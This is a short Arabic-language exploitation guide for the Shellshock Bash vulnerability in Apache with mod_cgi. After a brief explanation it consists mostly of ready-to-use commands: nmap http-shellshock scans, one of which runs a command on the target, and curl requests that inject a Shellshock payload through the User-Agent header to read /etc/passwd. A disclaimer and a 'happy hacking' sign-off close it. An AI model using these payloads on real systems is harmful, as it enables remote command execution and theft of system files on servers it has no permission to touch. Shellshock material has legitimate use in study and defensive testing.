
استغلال ثغرة "Shellshock". تنفيذ أكواد عن بُعد في Apache باستخدام mod_cgi
شلشوك هي ثغرة تنفيذ أوامر عن بُعد في BASH. يستغل هذا السكريبت الثغرة في بيئة الويب على Apache أو ما يشابهه مع تمكين mod_cgi. تكمن الثغرة في معالجة متغيرات البيئة، وهي قيم مسماة ديناميكية تؤثر على كيفية تشغيل العمليات على الحاسوب. يمكن للمهاجمين استغلال ذلك بإرفاق كود ضار بمتغيرات البيئة، والذي يتم تنفيذه عند استقبال المتغير. وهذا يسمح للمهاجمين باختراق النظام المحتمل.
$ nmap 192.168.x.x --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
$ nmap -sV -p- --script http-shellshock 192.168.x.x
$ nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls 192.168.x.x
sudo curl -H "User-Agent: () { :; }; /bin/cat /etc/passwd" <WEBSERVER-IP>
sudo curl -A "() { :;}; echo Content-Type: text/html; echo; /bin/cat /etc/passwd;" <WEBSERVER-IP>
أنا لست مسؤولاً عن أي استخدام غير قانوني أو ضرر ناتج عن هذه الأداة. كُتبت للمتعة وليس للشر، وتهدف إلى زيادة الوعي حول القرصنة والأمن السيبراني
قرصنة موفقة :)